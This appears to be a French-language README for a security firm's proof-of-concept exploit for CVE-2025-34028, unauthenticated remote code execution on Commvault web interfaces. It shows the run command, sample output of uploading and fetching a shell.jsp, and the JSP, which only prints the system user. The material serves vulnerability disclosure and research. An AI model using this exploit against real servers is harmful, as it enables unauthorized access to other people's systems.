
Exploit de preuve de concept pour CVE-2025-34028, démontrant une exécution de code à distance pré-authentifiée sur les interfaces web de Commvault via un téléchargement JSP malveillant.
Une preuve de concept d'exécution de code à distance sans authentification pour Commvault
Consultez notre article de blog pour les détails techniques
python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-commvault-rce-CVE-2025-34028.py
(*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-34028]
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$
Ce script est une preuve de concept pour CVE-2025-34028, ciblant les interfaces web Commvault. En téléchargeant un fichier zip contenant un fichier .jsp permettant l'exécution de code, le fichier zip est déposé dans un répertoire accessible publiquement et l'utilisateur système est détaillé dans la réponse. Plus de détails sont fournis dans notre article de blog.
Le script PoC utilise un fichier zip codé en dur contenant les fichiers suivants :
Contenu de Shell.jsp :
<%@ page import="java.util.*" %>
<html>
<body>
<h3>System Information</h3>
<p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
Plus de détails sur l'avis de sécurité Commvault
Pour les dernières recherches en sécurité, suivez l'équipe watchTowr Labs